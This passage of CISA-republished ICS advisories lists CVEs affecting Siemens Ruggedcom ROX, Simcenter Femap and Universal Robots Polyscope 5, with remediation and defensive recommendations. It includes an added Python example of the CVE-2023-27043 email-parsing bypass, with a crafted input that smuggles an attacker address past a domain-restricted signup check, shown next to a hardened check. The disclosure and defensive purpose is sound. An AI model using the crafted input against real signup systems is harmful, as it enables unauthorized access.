Affected Products for each CVE below: Siemens Ruggedcom Rox (Vendor: Siemens). Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000. Product Status: known_affected.
Remediation for each CVE below: Vendor fix. Update to V2.17.1 or later version: https://support.industry.siemens.com/cs/ww/en/view/110002017/

CVE-2019-13103 (continued)
Relevant CWE: CWE-674 Uncontrolled Recursion
Metrics: CVSS 3.1, Base Score 7.1, HIGH, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2019-13104
In Das U-Boot versions 2016.11-rc1 through 2019.07-rc4, an underflow can cause memcpy() to overwrite a very large amount of data (including the whole stack) while reading a crafted ext4 filesystem.
Relevant CWE: CWE-191 Integer Underflow (Wrap or Wraparound)
Metrics: CVSS 3.1, Base Score 7.8, HIGH, CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2019-13106
Das U-Boot versions 2016.09 through 2019.07-rc4 can memset() too much data while reading a crafted ext4 filesystem, which results in a stack buffer overflow and likely code execution.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 7.8, HIGH, CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2019-14192
An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy when parsing a UDP packet due to a net_process_received_packet integer underflow during an nc_input_packet call.
Relevant CWE: CWE-191 Integer Underflow (Wrap or Wraparound)
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14193
An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with an unvalidated length at nfs_readlink_reply, in the "if" block after calculating the new path length.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14194
An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with a failed length check at nfs_read_reply when calling store_block in the NFSv2 case.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14195
An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with unvalidated length at nfs_readlink_reply in the "else" block after calculating the new path length.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14196
An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with a failed length check at nfs_lookup_reply.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14197
An issue was discovered in Das U-Boot through 2019.07. There is a read of out-of-bounds data at nfs_read_reply.
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS 3.0, Base Score 9.1, CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE-2019-14198
An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with a failed length check at nfs_read_reply when calling store_block in the NFSv3 case.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14199
An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy when parsing a UDP packet due to a net_process_received_packet integer underflow during an *udp_packet_handler call.
Relevant CWE: CWE-191 Integer Underflow (Wrap or Wraparound)
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14200
An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: rpc_lookup_reply.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14201
An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_lookup_reply.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14202
An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_readlink_reply.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14203
An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_mount_reply.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-14204
An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_umountall_reply.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-10648
Das U-Boot through 2020.01 allows attackers to bypass verified boot restrictions and subsequently boot arbitrary images by providing a crafted FIT image to a system configured to boot the default configuration.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1, Base Score 7.8, HIGH, CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-2347
There exists an unchecked length field in UBoot. The U-Boot DFU implementation does not bound the length field in USB DFU download setup packets, and it does not verify that the transfer direction corresponds to the specified command. Consequently, if a physical attacker crafts a USB DFU download setup packet with a `wLength` greater than 4096 bytes, they can write beyond the heap-allocated request buffer.
Relevant CWE: CWE-122 Heap-based Buffer Overflow
Metrics: CVSS 3.1, Base Score 7.7, HIGH, CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-30552
Das U-Boot 2022.01 has a Buffer Overflow.
Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Metrics: CVSS 3.1, Base Score 5.5, MEDIUM, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-30790
Das U-Boot 2022.01 has a Buffer Overflow, a different issue than CVE-2022-30552.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 7.8, HIGH, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34835
In Das U-Boot through 2022.07-rc5, an integer signedness error and resultant stack-based buffer overflow in the "i2c md" command enables the corruption of the return address pointer of the do_i2c_md function.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, Base Score 9.8, CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2023-3019
A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service.
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS 3.1, Base Score 6.0, MEDIUM, CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

CVE-2023-27043
The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.
Relevant CWE: CWE-1286 Improper Validation of Syntactic Correctness of Input
Metrics: CVSS 3.1, Base Score 5.3, MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CVE-2024-3447
A heap-based buffer overflow was found in the SDHCI device emulation of QEMU. The bug is triggered when both `s->data_count` and the size of `s->fifo_buffer` are set to 0x200, leading to an out-of-bound access. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition.
Relevant CWE: CWE-122 Heap-based Buffer Overflow
Metrics: CVSS 3.1, Base Score 6.0, MEDIUM, CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

CVE-2024-22365
linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY.
Relevant CWE: CWE-664 Improper Control of a Resource Through its Lifetime
Metrics: CVSS 3.1, Base Score 5.5, MEDIUM, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2024-57256
An integer overflow in ext4fs_read_symlink in Das U-Boot before 2025.01-rc1 occurs for zalloc (adding one to an le32 variable) via a crafted ext4 filesystem with an inode size of 0xffffffff, resulting in a malloc of zero and resultant memory overwrite.
Relevant CWE: CWE-190 Integer Overflow or Wraparound
Metrics: CVSS 3.1, Base Score 7.1, HIGH, CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2024-57258
Integer overflows in memory allocation in Das U-Boot before 2025.01-rc1 occur for a crafted squashfs filesystem via sbrk, via request2size, or because ptrdiff_t is mishandled on x86_64.
Relevant CWE: CWE-190 Integer Overflow or Wraparound
Metrics: CVSS 3.1, Base Score 7.1, HIGH, CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2025-0395
When the assert() function in the GNU C Library versions 2.13 to 2.40 fails, it does not allocate enough space for the assertion failure message string and size information, which may lead to a buffer overflow if the message string size aligns to page size.
Relevant CWE: CWE-131 Incorrect Calculation of Buffer Size
Metrics: CVSS 3.1, Base Score 6.2, MEDIUM, CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-3576
A vulnerability in the MIT Kerberos implementation allows GSSAPI-protected messages using RC4-HMAC-MD5 to be spoofed due to weaknesses in the MD5 checksum design. If RC4 is preferred over stronger encryption types, an attacker could exploit MD5 collisions to forge message integrity codes. This may lead to unauthorized message tampering.
View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-328 Use of Weak Hash Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2025-6020 A flaw was found in linux-pam. The module pam_namespace may use access user-controlled paths without proper protection, allowing local users to elevate their privileges to root via multiple symlink attacks and race conditions. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-7425 A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption. 
View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H CVE-2025-9714 Uncontrolled recursion in XPath evaluation in libxml2 up to and including version 2.9.14 allows a local attacker to cause a stack overflow via crafted expressions. XPath processing functions `xmlXPathRunEval`, `xmlXPathCtxtCompile`, and `xmlXPathEvalExpr` were resetting recursion depth to zero before making potentially recursive calls. When such functions were called recursively this could allow for uncontrolled recursion and lead to a stack overflow. These functions now preserve recursion depth across recursive calls, allowing recursion depth to be controlled. 
View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.2 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-46836 net-tools is a collection of programs that form the base set of the NET-3 networking distribution for the Linux operating system. Inn versions up to and including 2.10, the Linux network utilities (like ifconfig) from the net-tools package do not properly validate the structure of /proc files when showing interfaces. `get_name()` in `interface.c` copies interface labels from `/proc/net/dev` into a fixed 16-byte stack buffer without bounds checking, leading to possible arbitrary code execution or crash. The known attack path does not require privilege but also does not provide privilege escalation in this scenario. A patch is available and expected to be part of version 2.20. 
View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.6 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H CVE-2025-49794 A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-825 Expired Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2025-49796 A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. 
This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. 
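
The following is an added example, not part of the Siemens or CISA advisory, illustrating the bypass class described for CVE-2023-27043 above together with a signup check that does not depend on which part of the header the parser picks. The allowed domain, the inputs and the address regular expression are constructed for the demonstration. What `parseaddr()` returns for the crafted input differs between patched and unpatched Python builds, which is exactly why the hardened check does not rely on it.

```python
"""Added example: domain-restricted signup check that does not trust parseaddr() alone.

Illustrates the bypass class of CVE-2023-27043: an application grants access only to
addresses under one domain, but decides the domain from whatever email.utils.parseaddr()
reports as the addr-spec. All names, inputs and the regular expression below are
constructed for the demonstration; none of this is the vulnerable application's code.
"""
import re
from email.utils import parseaddr

# A bare addr-spec only: dot-atom local part, a dotted domain, nothing else.
# Display names, angle brackets, comments and stray ']' or '<' never reach the parser.
_BARE_ADDR_SPEC = re.compile(
    r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
    r"@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+"
)


def weak_signup_allowed(raw: str, allowed_domain: str) -> bool:
    """The pattern the CVE describes: trust whichever fragment parseaddr() returns."""
    _, addr = parseaddr(raw)
    return addr.lower().endswith("@" + allowed_domain.lower())


def signup_allowed(raw: str, allowed_domain: str) -> bool:
    """Hardened check: accept only input that is a bare addr-spec the parser agrees with."""
    raw = raw.strip()
    if not _BARE_ADDR_SPEC.fullmatch(raw):
        return False                      # special characters or a display-name form: reject
    _, parsed = parseaddr(raw)
    if parsed != raw:
        return False                      # parser and our reading disagree: reject, do not guess
    domain = parsed.rsplit("@", 1)[1]
    return domain.lower() == allowed_domain.lower()   # exact match, not a suffix match


if __name__ == "__main__":
    crafted = "alice@attacker.example]<bob@company.example.com>"   # constructed input
    for candidate in ("bob@company.example.com", "Bob <bob@company.example.com>", crafted):
        print(f"{candidate!r:55} weak={weak_signup_allowed(candidate, 'company.example.com')} "
              f"hardened={signup_allowed(candidate, 'company.example.com')}")
```

On an unpatched interpreter `weak_signup_allowed()` can accept the crafted input because `parseaddr()` reports an addr-spec under the allowed domain that is not where the message would be delivered; `signup_allowed()` rejects it before the parser is consulted, because the raw input is not a bare addr-spec, and additionally refuses any input on which its own reading and the parser's disagree.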
Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-577017 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. It is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
2026-05-12, revision 1: Publication Date
2026-05-14, revision 2: Initial CISA Republication of Siemens ProductCERT SSA-577017 advisory

Siemens Simcenter Femap

Summary
Simcenter Femap is affected by a heap-based buffer overflow vulnerability in the Datakit library that can be triggered when the application reads files in IPT format. If a user is tricked into opening a malicious file with the affected application, an attacker could leverage the vulnerability to execute code in the context of the current process. Siemens has released a new version of Simcenter Femap and recommends updating to the latest version.

Affected versions: Simcenter Femap < V2512.0003 (vers:intdot/<2512.0003)
CVSS v3: 7.8
Vendor: Siemens
Equipment: Siemens Simcenter Femap
Vulnerabilities: Heap-based Buffer Overflow

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2025-12659
The affected application contains a memory corruption vulnerability while parsing specially crafted IPT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-27349, ZDI-CAN-27389)
Affected products: Simcenter Femap (vendor: Siemens; status: known_affected)
Remediation: update to V2512.0003 or later (https://support.sw.siemens.com/product/275652363/)
CWE: CWE-122 Heap-based Buffer Overflow
CVSS v3.1: 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Acknowledgments
TrendAI Zero Day Initiative reported this vulnerability.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at https://www.siemens.com/industrialsecurity.

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed at https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-870926 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. It is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
2026-05-12, revision 1: Publication Date
2026-05-14, revision 2: Initial CISA Republication of Siemens ProductCERT SSA-870926 advisory

Universal Robots Polyscope 5

Summary
Successful exploitation of this vulnerability could allow an unauthenticated attacker to bypass authentication and execute code on the robot's operating system.

Affected versions: Polyscope 5 < 5.25.1
CVSS v3: 9.8
Vendor: Universal Robots
Equipment: Universal Robots Polyscope 5
Vulnerabilities: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Denmark

Vulnerabilities

CVE-2026-8153
OS command injection in the Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows an unauthenticated attacker to craft commands that execute code on the robot's OS.
Affected products: Universal Robots Polyscope 5 < 5.25.1 (vendor: Universal Robots; status: known_affected)
Remediation: Universal Robots has released Polyscope 5 version 5.25.1. For more information, see the Universal Robots article: https://www.universal-robots.com/articles/ur/cybersecurity/cve-2026-8153-command-injection-in-the-polyscope-5-dashboard-server/
CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSS v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Acknowledgments
Vera Mens of Claroty Team82 reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks: do not click web links or open attachments in unsolicited email messages; refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams; refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-05-14
2026-05-14, revision 1: Initial Publication

Siemens Ruggedcom Rox

Summary
Ruggedcom Rox contains an input validation vulnerability in the feature key installation process that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends updating to the latest versions.

Affected versions: all versions below V2.17.1 (vers:intdot/<2.17.1) of RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536 and RUGGEDCOM ROX RX5000
